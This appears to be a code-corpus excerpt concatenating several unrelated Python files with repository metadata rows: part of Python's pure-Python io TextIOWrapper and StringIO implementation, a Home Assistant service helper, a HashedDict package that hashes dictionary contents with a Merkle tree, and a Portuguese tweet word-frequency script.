errors = "strict"
else:
if not isinstance(errors, str):
raise ValueError("invalid errors: %r" % errors)
self._buffer = buffer
self._decoded_chars = '' # buffer for text returned from decoder
self._decoded_chars_used = 0 # offset into _decoded_chars for read()
self._snapshot = None # info for reconstructing decoder state
self._seekable = self._telling = self.buffer.seekable()
self._has_read1 = hasattr(self.buffer, 'read1')
self._configure(encoding, errors, newline,
line_buffering, write_through)
def _check_newline(self, newline):
if newline is not None and not isinstance(newline, str):
raise TypeError("illegal newline type: %r" % (type(newline),))
if newline not in (None, "", "\n", "\r", "\r\n"):
raise ValueError("illegal newline value: %r" % (newline,))
def _configure(self, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
self._encoding = encoding
self._errors = errors
self._encoder = None
self._decoder = None
self._b2cratio = 0.0
self._readuniversal = not newline
self._readtranslate = newline is None
self._readnl = newline
self._writetranslate = newline != ''
self._writenl = newline or os.linesep
self._line_buffering = line_buffering
self._write_through = write_through
# don't write a BOM in the middle of a file
if self._seekable and self.writable():
position = self.buffer.tell()
if position != 0:
try:
self._get_encoder().setstate(0)
except LookupError:
# Sometimes the encoder doesn't exist
pass
# self._snapshot is either None, or a tuple (dec_flags, next_input)
# where dec_flags is the second (integer) item of the decoder state
# and next_input is the chunk of input bytes that comes next after the
# snapshot point. We use this to reconstruct decoder states in tell().
# Naming convention:
# - "bytes_..." for integer variables that count input bytes
# - "chars_..." for integer variables that count decoded characters
def __repr__(self):
result = "<{}.{}".format(self.__class__.__module__,
self.__class__.__qualname__)
try:
name = self.name
except AttributeError:
pass
else:
result += " name={0!r}".format(name)
try:
mode = self.mode
except AttributeError:
pass
else:
result += " mode={0!r}".format(mode)
return result + " encoding={0!r}>".format(self.encoding)
@property
def encoding(self):
return self._encoding
@property
def errors(self):
return self._errors
@property
def line_buffering(self):
return self._line_buffering
@property
def write_through(self):
return self._write_through
@property
def buffer(self):
return self._buffer
def reconfigure(self, *,
encoding=None, errors=None, newline=Ellipsis,
line_buffering=None, write_through=None):
"""Reconfigure the text stream with new parameters.
This also flushes the stream.
"""
if (self._decoder is not None
and (encoding is not None or errors is not None
or newline is not Ellipsis)):
raise UnsupportedOperation(
"It is not possible to set the encoding or newline of stream "
"after the first read")
if errors is None:
if encoding is None:
errors = self._errors
else:
errors = 'strict'
elif not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
if encoding is None:
encoding = self._encoding
else:
if not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if newline is Ellipsis:
newline = self._readnl
self._check_newline(newline)
if line_buffering is None:
line_buffering = self.line_buffering
if write_through is None:
write_through = self.write_through
self.flush()
self._configure(encoding, errors, newline,
line_buffering, write_through)
def seekable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return self._seekable
def readable(self):
return self.buffer.readable()
def writable(self):
return self.buffer.writable()
def flush(self):
self.buffer.flush()
self._telling = self._seekable
def close(self):
if self.buffer is not None and not self.closed:
try:
self.flush()
finally:
self.buffer.close()
@property
def closed(self):
return self.buffer.closed
@property
def name(self):
return self.buffer.name
def fileno(self):
return self.buffer.fileno()
def isatty(self):
return self.buffer.isatty()
def write(self, s):
'Write data, where s is a str'
if self.closed:
raise ValueError("write to closed file")
if not isinstance(s, str):
raise TypeError("can't write %s to text stream" %
s.__class__.__name__)
length = len(s)
haslf = (self._writetranslate or self._line_buffering) and "\n" in s
if haslf and self._writetranslate and self._writenl != "\n":
s = s.replace("\n", self._writenl)
encoder = self._encoder or self._get_encoder()
# XXX What if we were just reading?
b = encoder.encode(s)
self.buffer.write(b)
if self._line_buffering and (haslf or "\r" in s):
self.flush()
self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
return length
def _get_encoder(self):
make_encoder = codecs.getincrementalencoder(self._encoding)
self._encoder = make_encoder(self._errors)
return self._encoder
def _get_decoder(self):
make_decoder = codecs.getincrementaldecoder(self._encoding)
decoder = make_decoder(self._errors)
if self._readuniversal:
decoder = IncrementalNewlineDecoder(decoder, self._readtranslate)
self._decoder = decoder
return decoder
# The following three methods implement an ADT for _decoded_chars.
# Text returned from the decoder is buffered here until the client
# requests it by calling our read() or readline() method.
def _set_decoded_chars(self, chars):
"""Set the _decoded_chars buffer."""
self._decoded_chars = chars
self._decoded_chars_used = 0
def _get_decoded_chars(self, n=None):
"""Advance into the _decoded_chars buffer."""
offset = self._decoded_chars_used
if n is None:
chars = self._decoded_chars[offset:]
else:
chars = self._decoded_chars[offset:offset + n]
self._decoded_chars_used += len(chars)
return chars
def _rewind_decoded_chars(self, n):
"""Rewind the _decoded_chars buffer."""
if self._decoded_chars_used < n:
raise AssertionError("rewind decoded_chars out of bounds")
self._decoded_chars_used -= n
def _read_chunk(self):
"""
Read and decode the next chunk of data from the BufferedReader.
"""
# The return value is True unless EOF was reached. The decoded
# string is placed in self._decoded_chars (replacing its previous
# value). The entire input chunk is sent to the decoder, though
# some of it may remain buffered in the decoder, yet to be
# converted.
if self._decoder is None:
raise ValueError("no decoder")
if self._telling:
# To prepare for tell(), we need to snapshot a point in the
# file where the decoder's input buffer is empty.
dec_buffer, dec_flags = self._decoder.getstate()
# Given this, we know there was a valid snapshot point
# len(dec_buffer) bytes ago with decoder state (b'', dec_flags).
# Read a chunk, decode it, and put the result in self._decoded_chars.
if self._has_read1:
input_chunk = self.buffer.read1(self._CHUNK_SIZE)
else:
input_chunk = self.buffer.read(self._CHUNK_SIZE)
eof = not input_chunk
decoded_chars = self._decoder.decode(input_chunk, eof)
self._set_decoded_chars(decoded_chars)
if decoded_chars:
self._b2cratio = len(input_chunk) / len(self._decoded_chars)
else:
self._b2cratio = 0.0
if self._telling:
# At the snapshot point, len(dec_buffer) bytes before the read,
# the next input to be decoded is dec_buffer + input_chunk.
self._snapshot = (dec_flags, dec_buffer + input_chunk)
return not eof
def _pack_cookie(self, position, dec_flags=0,
bytes_to_feed=0, need_eof=0, chars_to_skip=0):
# The meaning of a tell() cookie is: seek to position, set the
# decoder flags to dec_flags, read bytes_to_feed bytes, feed them
# into the decoder with need_eof as the EOF flag, then skip
# chars_to_skip characters of the decoded result. For most simple
# decoders, tell() will often just give a byte offset in the file.
return (position | (dec_flags<<64) | (bytes_to_feed<<128) |
(chars_to_skip<<192) | bool(need_eof)<<256)
def _unpack_cookie(self, bigint):
rest, position = divmod(bigint, 1<<64)
rest, dec_flags = divmod(rest, 1<<64)
rest, bytes_to_feed = divmod(rest, 1<<64)
need_eof, chars_to_skip = divmod(rest, 1<<64)
return position, dec_flags, bytes_to_feed, need_eof, chars_to_skip
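        # Worked example (editorial note, not in the original source): the
        # cookie for position=10, dec_flags=1, bytes_to_feed=2, need_eof=0,
        # chars_to_skip=3 is the integer
        #     10 | (1 << 64) | (2 << 128) | (3 << 192)
        # and _unpack_cookie() peels the five fields back off with repeated
        # divmod(..., 1 << 64), one 64-bit "digit" at a time.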
def tell(self):
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if not self._telling:
raise OSError("telling position disabled by next() call")
self.flush()
position = self.buffer.tell()
decoder = self._decoder
if decoder is None or self._snapshot is None:
if self._decoded_chars:
# This should never happen.
raise AssertionError("pending decoded text")
return position
# Skip backward to the snapshot point (see _read_chunk).
dec_flags, next_input = self._snapshot
position -= len(next_input)
# How many decoded characters have been used up since the snapshot?
chars_to_skip = self._decoded_chars_used
if chars_to_skip == 0:
# We haven't moved from the snapshot point.
return self._pack_cookie(position, dec_flags)
# Starting from the snapshot position, we will walk the decoder
# forward until it gives us enough decoded characters.
saved_state = decoder.getstate()
try:
# Fast search for an acceptable start point, close to our
# current pos.
# Rationale: calling decoder.decode() has a large overhead
# regardless of chunk size; we want the number of such calls to
# be O(1) in most situations (common decoders, sensible input).
# Actually, it will be exactly 1 for fixed-size codecs (all
# 8-bit codecs, also UTF-16 and UTF-32).
skip_bytes = int(self._b2cratio * chars_to_skip)
skip_back = 1
assert skip_bytes <= len(next_input)
while skip_bytes > 0:
decoder.setstate((b'', dec_flags))
                # Decode up to the tentative start point
n = len(decoder.decode(next_input[:skip_bytes]))
if n <= chars_to_skip:
b, d = decoder.getstate()
if not b:
# Before pos and no bytes buffered in decoder => OK
dec_flags = d
chars_to_skip -= n
break
# Skip back by buffered amount and reset heuristic
skip_bytes -= len(b)
skip_back = 1
else:
# We're too far ahead, skip back a bit
skip_bytes -= skip_back
skip_back = skip_back * 2
else:
skip_bytes = 0
decoder.setstate((b'', dec_flags))
# Note our initial start point.
start_pos = position + skip_bytes
start_flags = dec_flags
if chars_to_skip == 0:
# We haven't moved from the start point.
return self._pack_cookie(start_pos, start_flags)
# Feed the decoder one byte at a time. As we go, note the
# nearest "safe start point" before the current location
# (a point where the decoder has nothing buffered, so seek()
# can safely start from there and advance to this location).
bytes_fed = 0
need_eof = 0
# Chars decoded since `start_pos`
chars_decoded = 0
for i in range(skip_bytes, len(next_input)):
bytes_fed += 1
chars_decoded += len(decoder.decode(next_input[i:i+1]))
dec_buffer, dec_flags = decoder.getstate()
if not dec_buffer and chars_decoded <= chars_to_skip:
# Decoder buffer is empty, so this is a safe start point.
start_pos += bytes_fed
chars_to_skip -= chars_decoded
start_flags, bytes_fed, chars_decoded = dec_flags, 0, 0
if chars_decoded >= chars_to_skip:
break
else:
# We didn't get enough decoded data; signal EOF to get more.
chars_decoded += len(decoder.decode(b'', final=True))
need_eof = 1
if chars_decoded < chars_to_skip:
raise OSError("can't reconstruct logical file position")
# The returned cookie corresponds to the last safe start point.
return self._pack_cookie(
start_pos, start_flags, bytes_fed, need_eof, chars_to_skip)
finally:
decoder.setstate(saved_state)
def truncate(self, pos=None):
self.flush()
if pos is None:
pos = self.tell()
return self.buffer.truncate(pos)
def detach(self):
if self.buffer is None:
raise ValueError("buffer is already detached")
self.flush()
buffer = self._buffer
self._buffer = None
return buffer
def seek(self, cookie, whence=0):
def _reset_encoder(position):
"""Reset the encoder (merely useful for proper BOM handling)"""
try:
encoder = self._encoder or self._get_encoder()
except LookupError:
# Sometimes the encoder doesn't exist
pass
else:
if position != 0:
encoder.setstate(0)
else:
encoder.reset()
if self.closed:
raise ValueError("tell on closed file")
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if whence == SEEK_CUR:
if cookie != 0:
raise UnsupportedOperation("can't do nonzero cur-relative seeks")
# Seeking to the current position should attempt to
# sync the underlying buffer with the current position.
whence = 0
cookie = self.tell()
elif whence == SEEK_END:
if cookie != 0:
raise UnsupportedOperation("can't do nonzero end-relative seeks")
self.flush()
position = self.buffer.seek(0, whence)
self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
_reset_encoder(position)
return position
if whence != 0:
raise ValueError("unsupported whence (%r)" % (whence,))
if cookie < 0:
raise ValueError("negative seek position %r" % (cookie,))
self.flush()
# The strategy of seek() is to go back to the safe start point
# and replay the effect of read(chars_to_skip) from there.
start_pos, dec_flags, bytes_to_feed, need_eof, chars_to_skip = \
self._unpack_cookie(cookie)
# Seek back to the safe start point.
self.buffer.seek(start_pos)
self._set_decoded_chars('')
self._snapshot = None
# Restore the decoder to its state from the safe start point.
if cookie == 0 and self._decoder:
self._decoder.reset()
elif self._decoder or dec_flags or chars_to_skip:
self._decoder = self._decoder or self._get_decoder()
self._decoder.setstate((b'', dec_flags))
self._snapshot = (dec_flags, b'')
if chars_to_skip:
# Just like _read_chunk, feed the decoder and save a snapshot.
input_chunk = self.buffer.read(bytes_to_feed)
self._set_decoded_chars(
self._decoder.decode(input_chunk, need_eof))
self._snapshot = (dec_flags, input_chunk)
# Skip chars_to_skip of the decoded characters.
if len(self._decoded_chars) < chars_to_skip:
raise OSError("can't restore logical file position")
self._decoded_chars_used = chars_to_skip
_reset_encoder(cookie)
return cookie
def read(self, size=None):
self._checkReadable()
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
decoder = self._decoder or self._get_decoder()
if size < 0:
# Read everything.
result = (self._get_decoded_chars() +
decoder.decode(self.buffer.read(), final=True))
self._set_decoded_chars('')
self._snapshot = None
return result
else:
# Keep reading chunks until we have size characters to return.
eof = False
result = self._get_decoded_chars(size)
while len(result) < size and not eof:
eof = not self._read_chunk()
result += self._get_decoded_chars(size - len(result))
return result
def __next__(self):
self._telling = False
line = self.readline()
if not line:
self._snapshot = None
self._telling = self._seekable
raise StopIteration
return line
def readline(self, size=None):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
# Grab all the decoded text (we will rewind any extra bits later).
line = self._get_decoded_chars()
start = 0
# Make the decoder if it doesn't already exist.
if not self._decoder:
self._get_decoder()
pos = endpos = None
while True:
if self._readtranslate:
# Newlines are already translated, only search for \n
pos = line.find('\n', start)
if pos >= 0:
endpos = pos + 1
break
else:
start = len(line)
elif self._readuniversal:
# Universal newline search. Find any of \r, \r\n, \n
# The decoder ensures that \r\n are not split in two pieces
# In C we'd look for these in parallel of course.
nlpos = line.find("\n", start)
crpos = line.find("\r", start)
if crpos == -1:
if nlpos == -1:
# Nothing found
start = len(line)
else:
# Found \n
endpos = nlpos + 1
break
elif nlpos == -1:
# Found lone \r
endpos = crpos + 1
break
elif nlpos < crpos:
# Found \n
endpos = nlpos + 1
break
elif nlpos == crpos + 1:
# Found \r\n
endpos = crpos + 2
break
else:
# Found \r
endpos = crpos + 1
break
else:
# non-universal
pos = line.find(self._readnl)
if pos >= 0:
endpos = pos + len(self._readnl)
break
if size >= 0 and len(line) >= size:
endpos = size # reached length size
break
            # No line ending seen yet - get more data
while self._read_chunk():
if self._decoded_chars:
break
if self._decoded_chars:
line += self._get_decoded_chars()
else:
# end of file
self._set_decoded_chars('')
self._snapshot = None
return line
if size >= 0 and endpos > size:
endpos = size # don't exceed size
# Rewind _decoded_chars to just after the line ending we found.
self._rewind_decoded_chars(len(line) - endpos)
return line[:endpos]
@property
def newlines(self):
return self._decoder.newlines if self._decoder else None
class StringIO(TextIOWrapper):
"""Text I/O implementation using an in-memory buffer.
The initial_value argument sets the value of object. The newline
argument is like the one of TextIOWrapper's constructor.
"""
def __init__(self, initial_value="", newline="\n"):
super(StringIO, self).__init__(BytesIO(),
encoding="utf-8",
errors="surrogatepass",
newline=newline)
# Issue #5645: make universal newlines semantics the same as in the
# C version, even under Windows.
if newline is None:
self._writetranslate = False
if initial_value is not None:
if not isinstance(initial_value, str):
raise TypeError("initial_value must be str or None, not {0}"
.format(type(initial_value).__name__))
self.write(initial_value)
self.seek(0)
def getvalue(self):
self.flush()
decoder = self._decoder or self._get_decoder()
old_state = decoder.getstate()
decoder.reset()
try:
return decoder.decode(self.buffer.getvalue(), final=True)
finally:
decoder.setstate(old_state)
def __repr__(self):
# TextIOWrapper tells the encoding in its repr. In StringIO,
# that's an implementation detail.
return object.__repr__(self)
@property
def errors(self):
return None
@property
def encoding(self):
return None
def detach(self):
# This doesn't make sense on StringIO.
self._unsupported("detach")
| apache-2.0 | 3,254,690,779,113,176,000 | 33.70235 | 86 | 0.567581 | false |
jawilson/home-assistant | homeassistant/helpers/service.py | 1 | 3578 | """Service calling related helpers."""
import functools
import logging
# pylint: disable=unused-import
from typing import Optional # NOQA
import voluptuous as vol
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant # NOQA
from homeassistant.exceptions import TemplateError
from homeassistant.loader import get_component
import homeassistant.helpers.config_validation as cv
HASS = None # type: Optional[HomeAssistant]
CONF_SERVICE = 'service'
CONF_SERVICE_TEMPLATE = 'service_template'
CONF_SERVICE_ENTITY_ID = 'entity_id'
CONF_SERVICE_DATA = 'data'
CONF_SERVICE_DATA_TEMPLATE = 'data_template'
_LOGGER = logging.getLogger(__name__)
def service(domain, service_name):
"""Decorator factory to register a service."""
def register_service_decorator(action):
"""Decorator to register a service."""
HASS.services.register(domain, service_name,
functools.partial(action, HASS))
return action
return register_service_decorator
def call_from_config(hass, config, blocking=False, variables=None,
validate_config=True):
"""Call a service based on a config hash."""
if validate_config:
try:
config = cv.SERVICE_SCHEMA(config)
except vol.Invalid as ex:
_LOGGER.error("Invalid config for calling service: %s", ex)
return
if CONF_SERVICE in config:
domain_service = config[CONF_SERVICE]
else:
try:
config[CONF_SERVICE_TEMPLATE].hass = hass
domain_service = config[CONF_SERVICE_TEMPLATE].render(variables)
domain_service = cv.service(domain_service)
except TemplateError as ex:
_LOGGER.error('Error rendering service name template: %s', ex)
return
except vol.Invalid as ex:
_LOGGER.error('Template rendered invalid service: %s',
domain_service)
return
domain, service_name = domain_service.split('.', 1)
service_data = dict(config.get(CONF_SERVICE_DATA, {}))
def _data_template_creator(value):
"""Recursive template creator helper function."""
if isinstance(value, list):
for idx, element in enumerate(value):
value[idx] = _data_template_creator(element)
return value
if isinstance(value, dict):
for key, element in value.items():
value[key] = _data_template_creator(element)
return value
value.hass = hass
return value.render(variables)
if CONF_SERVICE_DATA_TEMPLATE in config:
for key, value in config[CONF_SERVICE_DATA_TEMPLATE].items():
service_data[key] = _data_template_creator(value)
if CONF_SERVICE_ENTITY_ID in config:
service_data[ATTR_ENTITY_ID] = config[CONF_SERVICE_ENTITY_ID]
hass.services.call(domain, service_name, service_data, blocking)
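# Editorial sketch (not part of the original module): a minimal config
# mapping accepted by call_from_config(); the service and entity id are
# hypothetical:
#
#   call_from_config(hass, {
#       'service': 'light.turn_on',
#       'entity_id': 'light.kitchen',
#       'data': {'brightness': 120},
#   })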
def extract_entity_ids(hass, service_call):
"""Helper method to extract a list of entity ids from a service call.
Will convert group entity ids to the entity ids it represents.
"""
if not (service_call.data and ATTR_ENTITY_ID in service_call.data):
return []
group = get_component('group')
# Entity ID attr can be a list or a string
service_ent_id = service_call.data[ATTR_ENTITY_ID]
if isinstance(service_ent_id, str):
return group.expand_entity_ids(hass, [service_ent_id])
return [ent_id for ent_id in group.expand_entity_ids(hass, service_ent_id)]
| mit | -4,978,868,469,255,821,000 | 33.403846 | 79 | 0.655115 | false |
JoEiner/hasheddict | hasheddict/__init__.py | 1 | 10088 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from zlib import crc32
from hashlib import sha256
from math import log, ceil
import collections
import threading
__all__ = ['HashedDict']
__version__ = "0.1.0"
__author__ = "Johannes Schreiner, [email protected]"
__credits__ = ["Johannes Schreiner"]
__url__ = "https://github.com/JoEiner/hasheddict"
__copyright__ = "(c) 2015 Johannes Schreiner"
__license__ = "GNU General Public License v3 or later (GPLv3+)"
class HashedDict(dict):
"""
A dictionary that provides cryptographic hashes of its contents.
See package documentation for usage instructions.
"""
def __init__(self, *args, **kwargs):
"""
Possible ways of instantiation:
HashedDict([algorithm[, trees_cache_size], ])
HashedDict([algorithm[, trees_cache_size], ]**kwargs)
HashedDict([algorithm[, trees_cache_size], ]iterable, **kwargs)
HashedDict([algorithm[, trees_cache_size], ]mapping, **kwargs)
@param algorithm: algorithm is a class that provides an interface
similar to hashlib.sha*() interface (see Lib/hashlib.py)
@type trees_cache_size: int
@param trees_cache_size: The number of internal trees the HashedDict buffers.
Raising this number increases memory usage, yet reduces
time consumption when the dictionary grows over its boundaries
Use only positive integers.
Examples::
        >>> a = HashedDict(one=1, two=2, three=3)
        >>> b = HashedDict(zip(['one', 'two', 'three'], [1, 2, 3]))
        >>> c = HashedDict([('two', 2), ('one', 1), ('three', 3)])
        >>> d = HashedDict({'three': 3, 'one': 1, 'two': 2})
        >>> from hashlib import md5, sha512
        >>> e = HashedDict(md5, one=1, two=2, three=3)
        >>> f = HashedDict(sha512, 1, zip(range(100000), reversed(range(100000))))
"""
dictargs = [arg for arg in args if isinstance(arg, collections.Iterable) or
isinstance(arg, collections.Mapping)]
if len(dictargs) > 1:
raise TypeError("HashedDict expected at most 1 iterable or mapping "
"argument, got %d" % len(args))
hashargs = [arg for arg in args if not isinstance(arg, collections.Iterable) and
not isinstance(arg, collections.Mapping)]
        self.__hashalg = hashargs[0] if len(hashargs) >= 1 else sha256
        self.__trees_cache_size = hashargs[1] if len(hashargs) >= 2 else 3
self.__key_to_hash = dict()
depth = self.__get_depth_for_length(0)
initial_tree = HashTree(self.__key_to_hash, self.__hashalg, depth)
initial_tree.start()
initial_tree.join()
self.__trees = {depth: initial_tree}
self.update(*dictargs, **kwargs)
def get_hash(self):
tree_nr = self.__get_depth_for_length(len(self))
return self.__trees[tree_nr].get_hash()
def __setitem__(self, key, value):
hash_value = self.__hash_item(key, value)
self.__key_to_hash[key] = hash_value
if key in self:
for tree in self.__trees.itervalues():
tree.delete(key, hash_value)
super(HashedDict, self).__setitem__(key, value)
for tree in self.__trees.itervalues():
tree.add(key, hash_value)
self.__manage_cached_trees()
def __delitem__(self, key):
self.__manage_cached_trees()
for tree in self.__trees.itervalues():
tree.delete(key, self.__key_to_hash[key])
del self.__key_to_hash[key]
super(HashedDict, self).__delitem__(key)
def update(self, *args, **kwargs):
if args:
if len(args) > 1:
raise TypeError("update expected at most 1 arguments, "
"got %d" % len(args))
other = dict(args[0])
for key in other:
self[key] = other[key]
for key in kwargs:
self[key] = kwargs[key]
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def __manage_cached_trees(self):
dict_length = len(self)
curr_depth = self.__get_depth_for_length(dict_length)
range_start = max(0, curr_depth - (self.__trees_cache_size/2))
range_end = range_start + self.__trees_cache_size
allowed_trees = set(xrange(range_start, range_end))
existing_trees = set(self.__trees.keys())
deprecated_keys = existing_trees - allowed_trees
new_keys = allowed_trees - existing_trees
for tree_key in deprecated_keys:
del self.__trees[tree_key]
for tree_key in new_keys:
new_tree = HashTree(self.__key_to_hash,
self.__hashalg, tree_key)
new_tree.start()
self.__trees[tree_key] = new_tree
@staticmethod
def __get_depth_for_length(length):
if length == 0:
return 0
else:
return int(ceil(log(length, 2)))
def __hash_item(self, key, value):
return (self.__hashalg(self.__hashalg(repr(key)).digest() +
self.__hashalg(repr(value)).digest()).digest())
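# Editorial note (not in the original source): __hash_item() above hashes each
# entry as H(H(repr(key)) + H(repr(value))), and it is these per-item digests
# -- not the raw values -- that the Merkle trees below fold into the
# dictionary-wide hash:
#
#   >>> hd = HashedDict(key1="value1")
#   >>> hd.get_hash()       # root digest, 32 bytes for the default sha256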
class HashTree(threading.Thread):
def __init__(self, key_to_hash, hashalg, tree_depth):
threading.Thread.__init__(self)
self.__key_to_hash = key_to_hash.copy()
self.__tree_depth = tree_depth
self.__hashalg = hashalg
def run(self):
self.__tree = self.__build_tree()
self.__leaf_hashes = self.__build_leaf_items()
self.__rehash_all()
def get_hash(self):
self.join()
return self.__tree[0][0]
def add(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
self.__leaf_hashes[position].append(hash_value)
self.__rehash(position)
def delete(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
while hash_value in self.__leaf_hashes[position]:
self.__leaf_hashes[position].remove(hash_value)
self.__rehash(position)
def __build_tree(self):
tree = []
for i in xrange(self.__tree_depth+1):
current_row = [None for j in xrange(1 << i)]
tree.append(current_row)
return tree
def __build_leaf_items(self):
leaf_count = 1 << self.__tree_depth
new_leaf_items = [[] for i in xrange(leaf_count)]
for key, hash_value in self.__key_to_hash.iteritems():
position = (crc32(key) & 0xffffffff) % leaf_count
new_leaf_items[position].append(hash_value)
return new_leaf_items
def __rehash_all(self):
self.__tree[-1] = [self.__hash_leaf(leaf_items) for leaf_items in self.__leaf_hashes]
for row_nr in xrange(self.__tree_depth,0,-1):
row = self.__tree[row_nr]
for current_position in xrange(0, (len(row)+1)/2):
self.__rehash_parent(row_nr, current_position)
def __rehash(self, leaf_position):
leaf_items = self.__leaf_hashes[leaf_position]
self.__tree[-1][leaf_position] = self.__hash_leaf(leaf_items)
lchild_pos = leaf_position
for row_nr in xrange(self.__tree_depth, 0, -1):
#current_position = self.__rehash_parent(row_nr, current_position)
rchild_pos = lchild_pos | (1 << (row_nr - 1))
lchild_pos = lchild_pos & ((1 << (row_nr - 1)) - 1)
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
def __hash_leaf(self, leaf_items):
leaf_items.sort()
hashalg = self.__hashalg()
for item in leaf_items:
hashalg.update(item)
return hashalg.digest()
def __rehash_parent(self, row_nr, element_pos):
lchild_pos = element_pos & ((1 << (row_nr - 1)) - 1)
rchild_pos = element_pos | (1 << (row_nr - 1))
#parent_pos = lchild_pos
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
#lchild_hash = children_row[lchild_pos]
#rchild_hash = children_row[rchild_pos]
#parent_row[parent_pos] = self.__hashalg(lchild_hash + \
# rchild_hash).digest()
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
if __name__ == '__main__':
pangram = HashedDict(pangram="The quick brown fox jumps over the lazy dog")
assert pangram.get_hash() == '\xe9|\xdcJ=\xda\x84\xbd\xa6\x8e\xea\x9c=\x16\x93' + \
'x\xb2\xff9\x83S!\xfbE\xbc\x0c\x83\xb8`H\x94\xa6'
hd1 = HashedDict()
empty_hash = hd1.get_hash()
assert empty_hash == "\xe3\xb0\xc4B\x98\xfc\x1c\x14\x9a\xfb\xf4\xc8\x99" + \
"o\xb9$'\xaeA\xe4d\x9b\x93L\xa4\x95\x99\x1bxR\xb8U"
hd1["key1"] = "value1"
new_hash = hd1.get_hash()
del hd1["key1"]
assert empty_hash == hd1.get_hash()
hd2 = HashedDict(key1="value1", key2="value2")
del hd2["key2"]
assert hd2.get_hash() == new_hash
del hd2["key1"]
assert hd2.get_hash() == empty_hash
hd3 = HashedDict()
assert hd3.get_hash() == empty_hash
hashList = []
for i in xrange(1026):
hashList.append(hd3.get_hash())
hd3[str(i)] = i
for i in xrange(1025, -1, -1):
del hd3[str(i)]
assert hashList[i] == hd3.get_hash()
print "all tests successful"
| gpl-3.0 | 3,286,080,142,900,720,000 | 33.19661 | 95 | 0.54322 | false |
eriksonJAguiar/TCC-UENP-Codigos | My_codes/tools-sentiment/word_freq.py | 1 | 4759 | import nltk
import pandas as pd
import re
from googletrans import Translator
from unicodedata import normalize
def read_csv(file):
df1 = pd.DataFrame.from_csv('files_extern/%s.csv'%(file),sep=';',index_col=0,encoding ='ISO-8859-1')
df1 = df1.reset_index()
return df1
def write_csv(data,file):
df = pd.DataFrame(data)
df.to_csv('files_extern/'+file+'.csv', mode='w', sep=';',index=False, header=False,encoding='utf8')
def clear(dataframe):
new_df_tweet = []
new_df_sent = []
zipped = zip(dataframe['tweet'],dataframe['opiniao'])
for (df,opiniao) in zipped:
expr = re.sub(r"http\S+", "", df)
#expr = re.sub(r"[@#]\S+","",expr)
expr = normalize('NFKD',expr).encode('ASCII','ignore').decode('ASCII')
filtrado = [w for w in nltk.regexp_tokenize(expr.lower(),"[^0-9\W_]+") if not w in nltk.corpus.stopwords.words('portuguese')]
for f in filtrado:
if len(f) >= 2:
#print(f)
#print(opiniao)
new_df_tweet.append(f)
new_df_sent.append(opiniao)
new_df = pd.DataFrame()
new_df['tokens'] = new_df_tweet
new_df['sentimento'] = new_df_sent
return new_df
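# Editorial example (not in the original source) of what clear() yields:
# URLs stripped, accents normalised away, text lower-cased, Portuguese
# stopwords dropped, and every surviving token tagged with its tweet's
# sentiment, e.g. the row ("Adorei o filme!", 1) contributes the token rows
# ("adorei", 1) and ("filme", 1).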
def convert_df(df):
new_df = []
for d in df:
if d == 'Positivo':
new_df.append(1)
elif d == 'Neutro':
new_df.append(0)
elif d == 'Negativo':
new_df.append(-1)
return new_df
def exlusivos(vet_neg,vet_neu,vet_pos):
ex_pos = []
ex_neg = []
ex_neu = []
tupla = zip(vet_neg,vet_neu,vet_pos)
for (neg,neu,pos) in tupla:
if not (neg in vet_pos or neg in vet_neu):
ex_neg.append(neg)
if not (neu in vet_neg or neu in vet_pos):
ex_neu.append(neu)
if not (pos in vet_neg or pos in vet_neu):
ex_pos.append(pos)
print(ex_neg)
print(ex_neu)
print(ex_pos)
return ex_neg, ex_neu, ex_pos
def bigram(frases, vet_neg, vet_neu, vet_pos):
    # NOTE: this function was unfinished in the original source ("if f.find()"
    # did not parse); the body below is a minimal, assumed completion that
    # collects the phrases containing words from each sentiment list.
    bi_neg = [f for f in frases if any(f.find(w) != -1 for w in vet_neg)]
    bi_neu = [f for f in frases if any(f.find(w) != -1 for w in vet_neu)]
    bi_pos = [f for f in frases if any(f.find(w) != -1 for w in vet_pos)]
    return bi_neg, bi_neu, bi_pos
if __name__ == '__main__':
df_tweets = read_csv('dataset-portuguese')
df_tweets['opiniao'] = convert_df(df_tweets['opiniao'])
df_words = clear(df_tweets)
neg = df_words.loc[df_words['sentimento'] == -1]
neu = df_words.loc[df_words['sentimento'] == 0]
pos = df_words.loc[df_words['sentimento'] == 1]
neg_freq = nltk.FreqDist(neg['tokens'])
neu_freq = nltk.FreqDist(neu['tokens'])
pos_freq = nltk.FreqDist(pos['tokens'])
vet_neg = []
vet_neu = []
vet_pos = []
#neg_freq.plot(50, cumulative=False)
#neu_freq.plot(50, cumulative=False)
#pos_freq.plot(50, cumulative=False)
#print(neg_freq.most_common(30))
#print('------------------------')
#print(neu_freq.most_common(30))
#print('------------------------')
#print(pos_freq.most_common(30))
tupla = zip(neg_freq.most_common(len(neg)),neu_freq.most_common(len(neu)),pos_freq.most_common(len(pos)))
df_neg = pd.DataFrame()
df_neu = pd.DataFrame()
df_pos = pd.DataFrame()
words_neg = dict()
words_neu = dict()
words_pos = dict()
words_neg['pt'] = []
words_neg['en'] = []
words_neg['es'] = []
words_neu['pt'] = []
